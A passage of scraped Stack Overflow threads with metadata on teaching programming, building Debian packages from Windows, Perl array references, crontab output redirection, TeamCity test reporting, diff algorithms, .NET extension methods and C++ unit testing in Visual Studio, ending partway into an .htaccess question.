I would absolutely recommend sticking with a language that has garbage collection, like D, Perl, or some interpreted language like javascript. It might be a good idea to stay away from Perl until Perl 6 is closer to completion, because it fixes some of the difficulties of reading and understanding Perl.
A: My personal experience started back in elementary school using Logo Writer (which in a way has evolved into Scratch). Granted, I was a little kid and computers were not as awesome as they are nowadays, but for the time being it took me places I hadn't been before... I think that's how I got hooked on the business... It was these first impressions, based on such simplicity and coolness, that made it stick in my head for life. That's how the basics of programming should be taught... as a simple process that produces magic.
Back in my first CS 101 course, I started with notions of what an algorithm was by building a Tequila Sunrise (a step-by-step process that can be repeated at any time with the right ingredients and will result in the same output). From there we moved on to basic math functions using Scheme (like EHaskins was saying... start small and then build up), and from there to notions of loops, Boolean logic, and structures, and then on to concepts of objects and some simulation executions...
One of the good things about this approach is that language was not a goal but just a tool in the process of learning the concepts and basics of programming (just like operators, functions and else are in mathematics).
IMHO learning the basics of programming and creating a foundation is probably the best thing you could teach your brother. Once that goal is covered, you can move on to a more general-use language like Python and teach him higher concepts like architecture and design patterns (make them natural in the process so he will get used to good practices from early stages and will see them as part of the process)... we are not reinventing the wheel, but we always have to start by making fire.
From there on the sky is the limit!
A: In my biased opinion, C is the best point to start. The language is small, its high-level features are ubiquitous, and the low-level features let you learn the machine.
I found the C Primer Plus, 5th Edition very helpful as a beginning programmer with almost no programming experience. It assumes no prior programming experience, fun to read and covers C in depth (including the latest C99 standard).
A: For me, exploring and experimenting within the IDE itself helped me to learn Java and Visual Basic, but I learnt the basics of programming the hard way: Perl 5. There wasn't a free IDE back then, so it meant typing codes into Notepad, saving it, and then run the perl interpreter.
I'd say that IDEs make learning the basics of programming easier. Try playing around with control structures and variables first. Say in Java:
int a = 5;
for (int i = 0; i < a; i++) {
System.out.println("i is now " + i);
}
Basically, simply learning the control structures and variables would allow a beginner to start coding fun stuff already.
A: The best way to learn anything is to start with the basics. You can find any good textbook to explain what programming is - memory, algorithms, and so on.
The next step is to select the language; that just depends on what the teacher knows or why the student wants to learn.
Then it is just code, code, code. Code every example right from the book. Then change it slightly to do another action. Learning to program is an active process, not a passive one. You can't just read C++ How to Program by Deitel and then expect to code C++ without having actively done it while reading.
Even if you are an experienced coder it helps to write the code in the book to learn something new.
A: Something to consider ... not everyone is capable of programming:
Some people just cannot get past things like:
A = 1
B = 2
A = B
(these people will still think A = 1)
Jeff has talked about this too. In fact, my example is in the link (and explained, to boot).
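In Python terms, the same three lines behave like this (a direct transcription, nothing more):
a = 1
b = 2
a = b
print(a)   # prints 2, not 1 - a now holds b's value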
A: It may seem weird, but I got started writing code by automating the tasks and data analysis at my former job. This was accomplished by recording then studying the code an Excel macro generated. Of course this approach assumes you can learn via VB.
A: Some additional information that someone could attach to Jason Pratt's earlier post on Alice ... specifically, a Storytelling Alice variant.
Although the study presented targets middle school girls, you may find the white paper written by Caitlin Kelleher interesting.
A: One I used with my kids is CEEBot. It's not python, but it teaches C / Java style programming in a fun, robot-programming kind of game. It is aimed at 10-15 year olds, but it is a really good one.
A: Having small, obtainable goals is one of the greatest ways to learn any skill. Programming is no different. Python is a great language to start with because it is easy to learn, clean and can still do advanced things. Python is only limited by your imagination.
One way to really get someone interested is to give them small projects that they can do in an hour or so. When I originally started learning Python I played Code Golf. They have many small challenges that will help teach the basics of programming. I would recommend just trying to solve one of the challenges a day and then playing with the concepts learned. You've got to make learning to program fun or the interest will be lost very quickly.
A: As a non-programmer myself, I found the book "How to Program" from Pragmatic Programmers very helpful from a rudimentary standpoint. It's approachable and easy to read for a beginner. It won't take you from beginner to expert, but it will prepare you for what to do once you pick a language and pick up your first "Learn to Program in (language here)" book.
A: A couple of other starting platforms:
*
*A good programmable calculator (that's what I learnt on back in the 70s) - an HP25, then an HP41; nowadays a TI-89, etc.
*Interactive Fiction platforms, like "Inform 7" provide another angle on the whole thing
*Flash/ActionScript
All of these are different and engaging, and any one of these might spark the kind of interest that is required to get a beginner off and running.
LBB
A: I'd recommend Think Python.
A: Your question depends quite a bit on the age and education of your brother, but if he is a child/teenager, I would recommend doing some GUI programming or graphics programming first (with Canvas etc.). It looks good, and you have immediate results. Algorithms are boring, and too abstract for young people (before, say, 15 years old).
When I started programming on the ZX Spectrum (I was like 12 years old), I liked to draw various things on the screen, and it was still interesting. I didn't learn about real algorithmic techniques until I was maybe 18. Don't be misled into thinking that such "simple" programming is a wrong start; the interest of the person learning it is the most important part of it.
So, I would look into PyKDE, PyGTK, PyQt or Python + OpenGL (there are certainly some tutorials on the net, I know of some Czech ones but that won't help you :)).
Of course, if your brother is older and has education close to mathematics, you can head directly to algorithms and such.
A: Whatever language and environment you choose, if the student wants to learn for professional reasons or to do "real" programming (whatever that is), have them start by writing their starter programs1 on paper and taking them away to run. Come back with the output and/or error results and have them fix things on paper.
This isn't especially harder at first than doing it on-screen and hitting run, but it will make things much easier when they start to discover the wonderful world of bugs.
1) short, "Hello, World!"-type programs that still have some logic and/or calculations, do this up to a few programs that can have bugs
A: Whatever they write, have them step through it in a debugger line-by-line on the first run. Let them see for themselves what the computer is doing. This takes a lot of mystery out of things, reduces intimidation ("oh, each line really is that simple!"), and helps them learn debugging skills and recognize why common errors are common (and why they're errors)
A: +1 to Stanford university lectures. http://see.stanford.edu/see/courseinfo.aspx?coll=824a47e1-135f-4508-a5aa-866adcae1111
They're simple, of high quality, and I can vouch for their ability to teach beginners (me being one of them).
A: I suggest "Computer Science Unplugged" as a complementary didactical material.
A: "Who's Afraid of C++"
By Heller
Might be worth a shot
A: Microsoft Small Basic is a free .NET based programming environment aimed to be a "fun" learning environment for beginners. The language is a subset of VB.NET and even contains a "Turtle" object familiar from the Logo language. The website contains a step-by-step tutorial.
A: I agree with superjoe30 above, but I don't have enough reputation yet to leave a comment.
I was a C.S. professor for 4 years. The languages were Basic, and then Pascal, but it doesn't really matter what the language is.
The biggest lesson I learned as a new prof was, no matter how simple I thought a concept was, it is not simple to a newbie. Never go any faster than your student can go. I can't emphasize that enough. Go really, really slow.
I would start with very simple stuff, read and print, maybe a simple calculation, just to get the student used to putting something in and getting something out. Then IF statements. Then really simple FOR loops, always in terms of something the student could write and have some fun with.
Then I would spend about 3 weeks teaching a very simple sort of machine language for a phony decimal machine called SIMPL, that you could single-step. The reason for doing this was so the student could see where the "rubber meets the road", that computers do things step-by-step, and that it makes a difference what order things happen in. Without that, students tend to think the computer can sort of read their mind and do everything all at once.
Then back to Basic. A couple weeks on arrays, because that is a big speed bump. Then sequential files, which is another speed bump. What I mean by "speed bump" is the student can be sailing along feeling quite confident, and then you hit them with a concept like arrays, and they are totally lost again, until you ease them through it.
Then, with those skills under their belts, I would have them pick a term project, because that is what makes programming interesting. Without a use for it, it's really boring. I would suggest a variety of projects, such as games, accounting programs, science programs, etc. It's really great to see them get turned on. Often they would ask me for help, and that's great, because you know they're learning.
While they were doing their projects, we would continue to cover more advanced programming techniques - searching, sorting, merging, how to make a simple database, etc.
Good luck. Teaching is hard work but satisfying when you see students grow.
A: Use real-world analogies and imaginary characters to teach them programming, like when I teach people about variables and control statements.
Usually I start with a calculator example. I say: imagine you have a box for every variable, and you have 10 cards with the numbers 0 - 9 printed on them. Say that the box can hold one card at a time, and use similar devices to explain how the other programming elements work.
And emphasize how every operator works... like how the simple '=' operator always computes the right-hand side first into one value, and puts that value into the box named "num_1" (which is the variable name).
This has been very very effective, as they are able to imagine the flow very quickly.
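In Python, the same two-step picture looks like this (num_1 as above; num_2 is just another hypothetical box):
num_1 = 2 + 3    # right-hand side computed first (5), then the value goes into the box "num_1"
num_2 = num_1    # copies the value from box "num_1" into box "num_2"; num_1 keeps its card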
A: Ask your brother if there's something he'd like to make a program do or invent a project for him that you think would interest him.
Something where he can know what the output is supposed to be. Point him to the materials (online or in print) pertinent to the project. If he's coming into Python or programming 'cold', be patient as he works his way through understanding the basics such as syntax, errors, and scoping, and be prepared to step aside and let him run and make his own mistakes when you start to see the light bulb go on over his head.
A: I highly recommend Python Programming: An Introduction to Computer Science 2nd Edition by John Zelle. It is geared towards beginners, and deals with the semantics of programming. After reading you will be able to pick up other languages much faster because of Zelle's semantic vs. syntactic approach. Check it out!
| {
"language": "en",
"url": "https://stackoverflow.com/questions/3088",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "324"
} |
Q: How can I create Debian install packages in Windows for a Visual Studio project? I'm developing some cross platform software targeting Mono under Visual Studio and would like to be able to build the installers for Windows and Linux (Ubuntu specifically) with a single button click. I figure I could do it by calling cygwin from a post-build event, but I was hoping for at best a Visual Studio plugin or at worst a more Windows-native way of doing it. It seems like the package format is fairly simple and this must be a common need.
edit: Re-asked question under other account due to duplicate login issue.
A: Debian's .deb packages are just "ar" archives containing tarballs. You can manipulate both types of files using cygwin or msys quite easily:
$ ar xv asciidoc_8.2.1-2_all.deb
x - debian-binary
x - control.tar.gz
x - data.tar.gz
$ tar -tzf control.tar.gz
./
./conffiles
./md5sums
./control
Or you can install all the "standard" Debian stuff using cygwin, I suppose, but most of that stuff won't benefit you much if you're building a .Net app anyway.
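If you want to script that from the Windows side, here is a rough sketch in Python. It assumes a prepared control file and a root/ staging directory laid out as the files should be installed, plus an ar binary (from cygwin, msys, or binutils) on the PATH; note also that dpkg can be picky about file ownership and permissions inside the tarballs.
import subprocess, tarfile

with open("debian-binary", "w") as f:
    f.write("2.0\n")                          # package format version string

with tarfile.open("control.tar.gz", "w:gz") as tar:
    tar.add("control", arcname="./control")  # at minimum, the control metadata file

with tarfile.open("data.tar.gz", "w:gz") as tar:
    tar.add("root", arcname="./")             # files laid out as they will be installed

# Member order matters: debian-binary must come first in the ar archive.
subprocess.check_call(["ar", "rc", "myapp.deb",
                       "debian-binary", "control.tar.gz", "data.tar.gz"])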
A: If you use the .NET Core SDK, you can use dotnet-packaging tools to create a Debian installer package from any platform that runs .NET Core.
For example, running dotnet deb -c Release -f netcoreapp2.1 -r ubuntu.16.04-x64 would then create a .deb file which you can use to install your app on Ubuntu 16.04.
The project repository has more details.
A: I am not aware of any plugin that does it natively, especially since Mono users seem to prefer MonoDevelop.
However, it should be possible to use Cygwin and a custom MSBuild Task or Batch file in order to achieve that by using the native .deb creation tools.
A:
this must be a common need.
Some small percentage of software developers develop for .NET
Some very small percentage of that group develop for mono
Some small percentage of that group wants to provide .debs instead of just a zip
Some very small percentage of that group wants to build their linux apps on windows instead of natively on linux
It's just you :-)
A: If you don't mind using Java tools it's possible to build Debian packages with jdeb in an Ant script. That's probably lighter than relying on Cygwin.
| {
"language": "en",
"url": "https://stackoverflow.com/questions/3106",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "22"
} |
Q: Can you force either a scalar or array ref to be an array in Perl? I have a perl variable $results that gets returned from a service. The value is supposed to be an array, and $results should be an array reference. However, when the array has only one item in it, $results will be set to that value, and not a referenced array that contains that one item.
I want to do a foreach loop on the expected array. Without checking ref($results) eq 'ARRAY', is there any way to have something equivalent to the following:
foreach my $result (@$results) {
# Process $result
}
That particular code sample will work for the reference, but will complain for the simple scalar.
EDIT: I should clarify that there is no way for me to change what is returned from the service. The problem is that the value will be a scalar when there is only one value and it will be an array reference when there is more than one value.
A: im not sure there's any other way than:
$result = [ $result ] if ref($result) ne 'ARRAY';
foreach .....
A: Well if you can't do...
for my $result ( ref $results eq 'ARRAY' ? @$results : $results ) {
# Process result
}
or this...
for my $result ( ! ref $results ? $results : @$results ) {
# Process result
}
then you might have to try something hairy scary like this!....
for my $result ( eval { @$results }, eval $results ) {
# Process result
}
and to avoid that dangerous string eval it becomes really ugly fugly!!....
for my $result ( eval { $results->[0] } || $results, eval { @$results[1 .. $#{ $results }] } ) {
# Process result
}
PS. My preference would be to abstract it away in a sub, a la the call_to_service() example given by reatmon.
A: Another solution would be to wrap the call to the server and have it always return an array to simplify the rest of your life:
sub call_to_service
{
my $returnValue = service::call();
if (ref($returnValue) eq "ARRAY")
{
return($returnValue);
}
else
{
return( [$returnValue] );
}
}
Then you can always know that you will get back a reference to an array, even if it was only one item.
foreach my $item (@{call_to_service()})
{
...
}
A: I would re-factor the code inside the loop and then do
if( ref $results eq 'ARRAY' ){
    my_sub($_) for @$results;  # the statement-modifier form of for uses $_; it can't declare its own loop variable
}else{
    my_sub($results);
}
Of course I would only do that if the code in the loop was non-trivial.
A: I've just tested this with:
#!/usr/bin/perl -w
use strict;
sub testit {
my @ret = ();
if (shift){
push @ret,1;
push @ret,2;
push @ret,3;
}else{
push @ret,"oneonly";
}
return \@ret;
}
foreach my $r (@{testit(1)}){
print $r." test1\n";
}
foreach my $r (@{testit()}){
print $r." test2\n";
}
And it seems to work ok, so I'm thinking it has something to do with the result getting returned from the service?
If you have no control over the returning service this might be a hard one to crack.
A: You can do it like this:
my @some_array
push (@some_array, results);
foreach my $elt(@some_array){
#do something
}
| {
"language": "en",
"url": "https://stackoverflow.com/questions/3112",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "28"
} |
Q: How to setup a crontab to execute at specific time How can I set up my crontab to execute X script at 11:59PM every day without emailing me or creating any logs?
Right now my crontab looks something like this
@daily /path/to/script.sh
A: Following up on svrist's answer, depending on your shell, the 2>&1 should go after > /dev/null or you will still see the output from stderr.
The following will silence both stdout and stderr:
59 23 * * * /usr/sbin/myscript > /dev/null 2>&1
The following silences stdout, but stderr will still appear (via stdout):
59 23 * * * /usr/sbin/myscript 2>&1 > /dev/null
The Advanced Bash Scripting Guide's chapter on IO redirection is a good reference--search for 2>&1 to see a couple of examples.
A: With the above response you will still receive email containing any text written to stderr. Some people redirect that away too, and make sure that the script writes a log instead.
... 2>&1 ....
A: When you do crontab -e, try this:
59 23 * * * /usr/sbin/myscript > /dev/null
That means: at minute 59 of hour 23, on every day of the month (*), every month, every weekday, execute myscript.
See man crontab for some more info and examples.
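Another option, if your cron is Vixie cron (the usual one on Linux): set an empty MAILTO at the top of the crontab, which suppresses mail for every job without touching the commands:
MAILTO=""
59 23 * * * /usr/sbin/myscript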
| {
"language": "en",
"url": "https://stackoverflow.com/questions/3136",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "18"
} |
Q: Using MBUnit in TeamCity I'm compiling a NAnt project on Linux with the TeamCity Continuous Integration server. I have been able to generate a test report by running NAnt on Mono through a Command Line Runner, but I don't have the option of using the report like a NAnt Runner. I'm also using MBUnit for the testing framework.
How can I merge in the test report and display "Tests failed: 1 (1 new), passed: 3049" for the build?
Update: take a look at MBUnitTask. It's a NAnt task that sends the messages TeamCity expects from NUnit, so it lets you use all of TeamCity's features for tests.
MBUnitTask
Update: Gallio has better support, so you just have to reference the Gallio MbUnit 3.5 DLLs instead of the MbUnit 3.5 DLLs and switch to the Gallio runner to make it work.
A: Gallio now has an extension to output TeamCity service messages.
Just use the included Gallio.NAntTasks.dll and enable the TeamCity extension. (this won't be necessary in the next release)
A: TeamCity watches the command line output from the build. You can let it know how your tests are going by inserting certain markers into that output See http://www.jetbrains.net/confluence/display/TCD3/Build+Script+Interaction+with+TeamCity. For example
##teamcity[testSuiteStarted name='Test1']
will let TeamCity know that a set of tests started. With MbUnit you can't output these markers while the tests are running, but you can transform the XML file that it outputs. Here is the XSL that I am using:
<?xml version="1.0" encoding="UTF-8"?>
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
<xsl:output method="text"/>
<xsl:template match="/">
<xsl:apply-templates/>
</xsl:template>
<xsl:template match="assemblies/assembly">
##teamcity[testSuiteStarted name='<xsl:value-of select="@name" />']
<xsl:apply-templates select="//run" />
##teamcity[testSuiteFinished name='<xsl:value-of select="@name" />']
</xsl:template>
<xsl:template match="run">
<xsl:choose>
<xsl:when test="@result='ignore' or @result='skip'">
##teamcity[testIgnored name='<xsl:value-of select="@name" />' message='Test Ignored']
</xsl:when>
<xsl:otherwise>
##teamcity[testStarted name='<xsl:value-of select="@name" />']
</xsl:otherwise>
</xsl:choose>
<xsl:if test="@result='failure'">
##teamcity[testFailed name='<xsl:value-of select="@name" />' message='<xsl:value-of select="child::node()/message"/>' details='<xsl:value-of select="normalize-space(child::node()/stack-trace)"/>']
</xsl:if>
<xsl:if test="@result!='ignore' and @result!='skip'">
##teamcity[testFinished name='<xsl:value-of select="@name" />']
</xsl:if>
</xsl:template>
</xsl:stylesheet>
A: Here's what I came up with
How can I merge in the test report?
First you'll need to get mbunit to generate both an XML and HTML report. The Command line arguments look like this
/rt:Xml /rt:Html /rnf:mbunit /rf:..\reports
this will generate the reports into a dir called reports and the file will be called mbunit.xml and mbunit.html
next we want to add these files as artifacts on the build
build\reports\* => Reports
the last step is to tell teamcity to add it as a tab for the build
find the .BuildServer\config\main-config.xml and add this line
(on windows this is in c:\Documents and Settings\, on linux it was in the /root dir)
<report-tab title="Tests" basePath="Reports" startPage="mbunit.html" />
How can I display "Tests failed: 1 (1 new), passed: 3049" for the build?
TeamCity looks for a file called teamcity-info.xml where you can stick messages in to be displayed. The Actual test count is actually just plain text. I think you can just add the file as an artifact but I've also got it in the root dir of the build.
in NAnt you'll want to use this command to do an XSLT on the MBUnit XML Report
<style style="includes\teamcity-info.xsl" in="reports\mbunit.xml" out="..\teamcity-info.xml" />
the actual xsl looks like this.
(Note: that the { and } are reserved in xsl so we have to use params)
<?xml version="1.0" encoding="ISO-8859-1"?>
<xsl:stylesheet version="1.0"
xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
<xsl:param name="cbl" select="'{'"/>
<xsl:param name="cbr" select="'}'"/>
<xsl:template match="/">
<xsl:for-each select="report-result/counter">
<build number="1.0.{concat($cbl,'build.number',$cbr)}">
<xsl:if test="@failure-count > 0">
<statusInfo status="FAILURE">
<text action="append"> Tests failed: <xsl:value-of select="@failure-count"/>, passed: <xsl:value-of select="@success-count"/></text>
</statusInfo>
</xsl:if>
<xsl:if test="@failure-count = 0">
<statusInfo status="SUCCESS">
<text action="append"> Tests passed: <xsl:value-of select="@success-count"/></text>
</statusInfo>
</xsl:if>
</build>
</xsl:for-each>
</xsl:template>
</xsl:stylesheet>
This will give you a file that looks like this
<build number="1.0.{build.number}">
<statusInfo status="FAILURE">
<text action="append">Tests failed: 16, passed: 88</text>
</statusInfo>
</build>
A: TeamCity Sidebar Gadget for Windows Vista, Windows 7
http://teamcity-gadget.com
| {
"language": "en",
"url": "https://stackoverflow.com/questions/3143",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "17"
} |
Q: 'Best' Diff Algorithm I need to implement a Diff algorithm in VB.NET to find the changes between two different versions of a piece of text. I've had a scout around the web and have found a couple of different algorithms.
Does anybody here know of a 'best' algorithm that I could implement?
A: Well, I've used the C# version on CodeProject and it's really good for what I wanted...
http://www.codeproject.com/KB/recipes/diffengine.aspx
You can probably get this translated into VB.NET via an online converter if you can't do it yourself...
A: I like An O(ND) Difference Algorithm and Its Variations by Eugene Myers. I believe it's the algorithm that was used in GNU diff. For a good background see Wikipedia.
This is quite theoretical and you might wish to find source code, but I'm not aware of any in VB.
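If it helps to see the shape of the problem, here is a minimal C# sketch of a plain LCS-based diff. To be clear, this is the naive dynamic-programming approach rather than Myers' O(ND) algorithm, and all names are my own:
using System;
using System.Collections.Generic;

static class SimpleDiff
{
    // Emits lines prefixed with "  " (unchanged), "- " (removed from a) or "+ " (added in b),
    // derived from the longest common subsequence of the two line arrays.
    public static IEnumerable<string> Diff(string[] a, string[] b)
    {
        // lcs[i, j] = length of the LCS of a[i..] and b[j..]
        var lcs = new int[a.Length + 1, b.Length + 1];
        for (int i = a.Length - 1; i >= 0; i--)
            for (int j = b.Length - 1; j >= 0; j--)
                lcs[i, j] = a[i] == b[j]
                    ? lcs[i + 1, j + 1] + 1
                    : Math.Max(lcs[i + 1, j], lcs[i, j + 1]);

        // Walk the table to emit the edit script.
        int x = 0, y = 0;
        while (x < a.Length && y < b.Length)
        {
            if (a[x] == b[y]) { yield return "  " + a[x]; x++; y++; }
            else if (lcs[x + 1, y] >= lcs[x, y + 1]) yield return "- " + a[x++];
            else yield return "+ " + b[y++];
        }
        while (x < a.Length) yield return "- " + a[x++];
        while (y < b.Length) yield return "+ " + b[y++];
    }
}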
A: I don't know for sure if they're the best diff algorithms, but you might want to check out these links that talk about SOCT4 and SOCT6
http://dev.libresource.org/home/doc/so6-user-manual/concepts
and also:
http://www.loria.fr/~molli/pmwiki/uploads/Main/so6group03.pdf
http://www.loria.fr/~molli/pmwiki/uploads/Main/diffalgo.pdf
| {
"language": "en",
"url": "https://stackoverflow.com/questions/3144",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "18"
} |
Q: What are the best practices for using Extension Methods in .Net? I have seen these being used every which way, and have been accused of using them the wrong way (though in that case, I was using them that way to demonstrate a point).
So, what do you think are the best practices for employing Extension Methods?
Should development teams create a library of extension methods and deploy them across various projects?
Should there be a collection of common extension methods in the form of an open source project?
Update: have decided to create an organization wide extension methods library
A: The upcoming release of the Framework Design Guidelines, 2nd Edition will have some guidance for implementing extension methods, but in general:
You should only define extension methods "where they make semantic sense" and are providing helper functionality relevant to every implementation.
You also should avoid extending System.Object as not all .NET languages will be able to call the extension method as an extension. (VB.NET for instance would need to call it as a regular static method on the static extension class.)
Don't define an extension method in the same namespace as the extended type unless you're extending an interface.
Don't define an extension method with the same signature as a "real" method since it will never be called.
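As a small hypothetical example that follows those rules (all names invented for illustration): the extension lives in its own namespace, targets a concrete type rather than System.Object, and doesn't shadow an existing String member:
using System;

namespace MyCompany.Extensions   // deliberately not the System namespace of the extended type
{
    public static class StringExtensions
    {
        // A helper that makes semantic sense for any string and whose name
        // doesn't collide with an existing String method.
        public static string Truncate(this string value, int maxLength)
        {
            if (value == null) throw new ArgumentNullException("value");
            return value.Length <= maxLength ? value : value.Substring(0, maxLength);
        }
    }
}

// usage: "Hello, world".Truncate(5) returns "Hello"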
A: You might want to take a look at http://www.codeplex.com/nxl and http://www.codeplex.com/umbrella, which are both extension method libraries. I personally haven't had a look at the source code but I'm sure the guys there would be able to give you some good pointers.
A: I've been including my extension methods in with my Core libraries in the Utils class, because people who are working with my framework are likely to find the methods useful. But for mass deployment, where the end developer might have a choice of extension method libraries, I would advise putting all of your extensions into their own namespace, even their own project file, so that people can choose to add a reference or a using statement, or simply qualify the call where required, like so:
Core.Extensions.Base64Encode(str);
My Utils class is my bestest friend in the whole world, it was before extension methods came along and they have only helped to strengthen our relationship. The biggest rule I would go by is to give people choice over what extension framework they are using where possible.
A: The Objective-C language has had "Categories" since the early 1990s; these are essentially the same thing as .NET Extension Methods. When looking for best practices you might want to see what rules of thumb Objective-C (Cocoa & NeXT) developers have come up with around them.
Brent Simmons (the author of the NetNewsWire RSS reader for Mac OS X and iPhone) just posted today about his new style rules for the use of categories and there's been a bit of discussion in the Cocoa community around that post.
A: I think that it depends on what purpose the Extension methods serve.
*
*Extension methods that relate to specific business needs of a project (whether they are connected to basic data types or custom objects) should not be included in a library that would be distributed across multiple projects.
*Extension methods that relate to basic data types (int, string, etc) or generics that have a wider application could be packaged and distributed across projects.
Take care not to globally include Extension methods that have little application, as they just clog up intellisense and can lead to confusion and/or misuse.
A: When I first found out about Extensions I really overused and abused them.
For the most part I have started to get away from using any Extension Methods for a number of reasons.
Some of the reasons I stopped using them are noted in Scott's blog link above, such as "Think twice before extending types you don't own". If you have no control over the source for the types you are extending, you may encounter issues/collisions in the future if the source type has some additions/changes, such as moving your project to a newer .NET version. If the newer .NET version includes a method on the type of the same name as your extension, someone is going to get clobbered.
The main reason why I stopped using Extension Methods is that you can't quickly tell from reading the code where the source of the method is and who "owns" it.
When just reading through the code you can't tell whether the method is an extension or just a standard NET API method on the type.
The intellisense menu can get really messy really fast.
| {
"language": "en",
"url": "https://stackoverflow.com/questions/3147",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "43"
} |
Q: How to set up unit testing for Visual Studio C++ I'm having trouble figuring out how to get the testing framework set up and usable in Visual Studio 2008 for C++ presumably with the built-in unit testing suite.
Any links or tutorials would be appreciated.
A: Here is the approach I use to test the IIS URL Rewrite module at Microsoft (it is command-line based, but should work for VS too):
*
*Make sure your header files are consumable by moving source code to cpp files and using forward declaration if needed.
*Compile your code to test as library (.lib)
*Create your UnitTest project as C++ with CLR support.
*Include your header files.
*Include your .lib files.
*Add a reference to Microsoft.VisualStudio.QualityTools.UnitTestFramework.dll
*Use a really small class for declaring your unit test and jump from managed to C++/Native code like this (may have typos):
Here is an example:
// Example
#include "stdafx.h"
#include "mstest.h"
// Following code is native code.
#pragma unmanaged
void AddTwoNumbersTest() {
// Arrange
Adder yourNativeObject;
int expected = 3;
int actual;
// Act
actual = yourNativeObject.Add(1, 2);
// Assert
Assert::AreEqual(expected, actual, L"1 + 2 != 3");
}
// Following code is C++/CLI (Managed)
#pragma managed
using namespace Microsoft::VisualStudio::TestTools::UnitTesting;
[TestClass]
public ref class TestShim {
public:
[TestMethod]
void AddTwoNumbersTest() {
// Just jump to C++ native code (above)
::AddTwoNumbersTest();
}
};
With this approach, people don't have to learn too much C++/CLI stuff, all the real test will be done in C++ native and the TestShim class will be used to 'publish' the test to MSTest.exe (or make it visible).
For adding new tests you just declare a new [TestMethod] void NewTest(){::NewTest();} method and a new void NewTest() native function. No macros, no tricks, straighforward.
Now, the header file is optional, but it can be used to expose the Assert class' methods with C++ native signatures (e.g. wchar_t* instead of String^), so you can keep it close to C++ and far from C++/CLI:
Here is an example:
// Example
#pragma once
#pragma managed(push, on)
using namespace System;
class Assert {
public:
static void AreEqual(int expected, int actual) {
Microsoft::VisualStudio::TestTools::UnitTesting::Assert::AreEqual(expected, actual);
}
static void AreEqual(int expected, int actual, PCWSTR pszMessage) {
Microsoft::VisualStudio::TestTools::UnitTesting::Assert::AreEqual(expected, actual, gcnew String(pszMessage));
}
template<typename T>
static void AreEqual(T expected, T actual) {
Microsoft::VisualStudio::TestTools::UnitTesting::Assert::AreEqual(expected, actual);
}
// Etcetera, other overloads...
};
#pragma managed(pop)
HTH
A: Personally, I prefer WinUnit since it doesn't require me to write anything except for my tests (I build a .dll as the test, not an exe). I just build a project, and point WinUnit.exe to my test output directory and it runs everything it finds. You can download the WinUnit project here. (MSDN now requires you to download the entire issue, not the article. WinUnit is included within.)
A: This page may help, it reviews quite a few C++ unit test frameworks:
*
*CppUnit
*Boost.Test
*CppUnitLite
*NanoCppUnit
*Unit++
*CxxTest
Check out CPPUnitLite or CPPUnitLite2.
CPPUnitLite was created by Michael Feathers, who originally ported Java's JUnit to C++ as CPPUnit (CPPUnit tries mimic the development model of JUnit - but C++ lacks Java's features [e.g. reflection] to make it easy to use).
CPPUnitLite attempts to make a true C++-style testing framework, not a Java one ported to C++. (I'm paraphrasing from Feather's Working Effectively with Legacy Code book). CPPUnitLite2 seems to be another rewrite, with more features and bug fixes.
I also just stumbled across UnitTest++ which includes stuff from CPPUnitLite2 and some other framework.
Microsoft has released WinUnit.
Also check out Catch or Doctest
A: The framework included with VS9 is .NET, but you can write tests in C++/CLI, so as long as you're comfortable learning some .NET isms, you should be able to test most any C++ code.
boost.test
and googletest
look to be fairly similar, but adapted for slightly different uses. Both of these have a binary component, so you'll need an extra project in your solution to compile and run the tests.
The framework we use is CxxTest, which is much lighter; it's headers only, and uses a Perl (!) script to scrape test suite information from your headers (suites inherit from CxxTest::Base, all your test methods' names start with "test"). Obviously, this requires that you get Perl from one source or another, which adds overhead to your build environment setup.
A: There is a way to test unmanaged C++ using the built in testing framework within Visual Studio 2008. If you create a C++ Test Project, using C++/CLI, you can then make calls to an unmanaged DLL. You will have to switch the Common Language Runtime support to /clr from /clr:safe if you want to test code that was written in unmanaged C++.
I have step by step details on my blog here: http://msujaws.wordpress.com/2009/05/06/unit-testing-mfc-with-mstest/
A: I use UnitTest++.
In the years since I made this post the source has moved from SourceForge to github. Also the example tutorial is now more agnostic - doesn't go into any configuration or project set up at all.
I doubt it will still work for Visual Studio 6 as the project files are now created via CMake. If you still need the older version support you can get the last available version under the SourceForge branch.
A: The tools that have been mentioned here are all command-line tools. If you look for a more integrated solution, have a look at cfix studio, which is a Visual Studio AddIn for C/C++ unit testing. It is quite similar to TestDriven.Net, but for (unmanaged) C/C++ rather than .NET.
A: I've used CppUnit with VS2005 and Eclipse. The wiki is very thorough (especially if you are familiar with JUnit).
A: I'm not 100% sure about VS2008, but I know that the Unit Testing framework that Microsoft shipped in VS2005 as part of their Team Suite was only for .NET, not C++.
I've used CppUnit also and it was alright. Much the same as NUnit/JUnit/so on.
If you've used boost, they also have a unit testing library
The guys behind boost have some serious coding chops, so I'd say their framework should be pretty good, but it might not be the most user friendly :-)
A: The unit tester for Visual Studio 2008 is only for .NET code as far as I know.
I used CppUnit on Visual Studio 2005 and found it to be pretty good.
As far as I remember, the setup was relatively painless. Just make sure that in your testing projects the linker (Linker → Input → Additional Dependencies) includes cppunitd.lib.
Then, #include <cppunit/extensions/HelperMacros.h> in your header.
You can then follow the steps in http://cppunit.sourceforge.net/doc/1.11.6/cppunit_cookbook.html to get your test class working.
A: I like the CxxTest as well for the same reasons. It's a header file only so no linking required. You aren't stuck with Perl as there is a Python runner as well. I will be reviewing the google library soon. The Boost stuff pulls in too much other baggage.
A: I struggled to implement unit testing for an unmanaged C++ application in a Windows environment with Visual Studio, but I managed to overcome that and wrote a post as step-by-step guidance for unit testing an unmanaged C++ application. I hope it may help you.
Unit test for unmanaged C++ in Visual Studio
| {
"language": "en",
"url": "https://stackoverflow.com/questions/3150",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "94"
} |
Q: .htaccess directives to *not* redirect certain URLs In an application that heavily relies on .htaccess RewriteRules for its PrettyURLs (CakePHP in my case), how do I correctly set up directives to exclude certain directories from this rewriting? That is:
/appRoot/.htaccess
app/
static/
